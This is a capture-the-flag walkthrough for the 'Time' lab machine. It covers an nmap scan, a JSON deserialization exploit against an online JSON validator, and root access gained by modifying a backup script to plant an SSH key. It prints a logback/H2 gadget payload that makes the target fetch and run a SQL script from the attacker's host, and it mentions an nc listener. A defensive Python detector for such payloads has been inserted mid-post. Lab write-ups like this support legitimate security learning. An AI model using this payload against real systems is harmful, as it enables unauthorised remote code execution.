In this post, I would like to share a walkthrough of the TIME Machine.
This machine is rated as MEDIUM difficulty.
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Information Gathering on the Time machine
Let’s open the browser and go straight to the website interface.
We are directed to the Online JSON interface. Let’s test the website by typing anything with the Validate (beta!) option selected.
Let’s do some research on the errors that appear above.
After some research on the internet, I found a script that can be used for exploitation on the website.
The code that we can use for the exploitation looks like below:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<attacker's ip>:8080/<filename>.sql'"}]
Exploiting the application with JSON code
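From the defending side, input of this shape can be flagged before it reaches the parser. The following is an added example, not code from the original post or from the application: it walks a submitted JSON document and reports two-element arrays that name a Java class (the shape of the payload above) and H2 JDBC URLs whose INIT setting pulls a script from a remote host. The function names, the 192.0.2.10 address and the placeholder file name are assumptions made for the example.

```python
import json
import re

# Dotted Java class name, e.g. ch.qos.logback.core.db.DriverManagerConnectionSource
JAVA_CLASS = re.compile(r"^(?:[a-z_][a-z0-9_]*\.)+[A-Z][A-Za-z0-9_$]*$")
# H2 JDBC URL whose INIT setting runs a script fetched from a remote host
H2_REMOTE_INIT = re.compile(
    r"jdbc:h2:[^'\"]*INIT\s*=\s*RUNSCRIPT\s+FROM\s+'(?:https?|ftp)://", re.I)


def inspect(node, path="$"):
    """Return a list of (path, reason) findings for one parsed JSON value."""
    findings = []
    if isinstance(node, list):
        # Wrapper-array form: ["fully.qualified.Class", {properties}]
        if (len(node) == 2 and isinstance(node[0], str)
                and isinstance(node[1], dict) and JAVA_CLASS.match(node[0])):
            findings.append((path, "type-wrapper array names class " + node[0]))
        for i, child in enumerate(node):
            findings += inspect(child, f"{path}[{i}]")
    elif isinstance(node, dict):
        for key, child in node.items():
            findings += inspect(child, f"{path}.{key}")
    elif isinstance(node, str) and H2_REMOTE_INIT.search(node):
        findings.append((path, "H2 JDBC URL with remote INIT=RUNSCRIPT"))
    return findings


def scan(raw):
    """Parse a submitted JSON document and return its findings (empty = clean)."""
    try:
        return inspect(json.loads(raw))
    except json.JSONDecodeError:
        return [("$", "not valid JSON")]


# Constructed samples: the payload shape shown above with a documentation
# address (192.0.2.10) and a placeholder file name, plus a benign document.
SUSPICIOUS = ('["ch.qos.logback.core.db.DriverManagerConnectionSource", '
              '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
              "INIT=RUNSCRIPT FROM 'http://192.0.2.10:8080/placeholder.sql'\"}]")
BENIGN = '{"name": "report", "tags": ["a", "b"], "pair": ["x", {"k": 1}]}'

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan(doc))
```

A filter like this is a detection aid for logs or a gateway; it does not replace restricting which classes the deserializer is allowed to instantiate.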
Before we click Process, we need to create a new file, <filename>.sql.
The code that will be used is shown below:
Let’s start our nc listener in another terminal.
As usual, you will need to access /home/pericles, where you will find user.txt stored.
Next, let’s go and retrieve the root flag!
Escalate to Root Privileges Access on Time Machine
We need to create an SSH public and private key pair to access the machine via the SSH service.
You will need to copy your id_rsa code and paste it on the target machine, with an extra command being used here.
The screenshot above shows the actual code that will be pasted on the target machine.
The screenshot above shows the target’s machine
In the screenshot above, the file timer_backup.sh is the one that we just modified to gain access via the SSH service.
We should get root access after a while.
We can read the root flag by typing the “cat root.txt” command
-THE END-
Happy Learning Guys!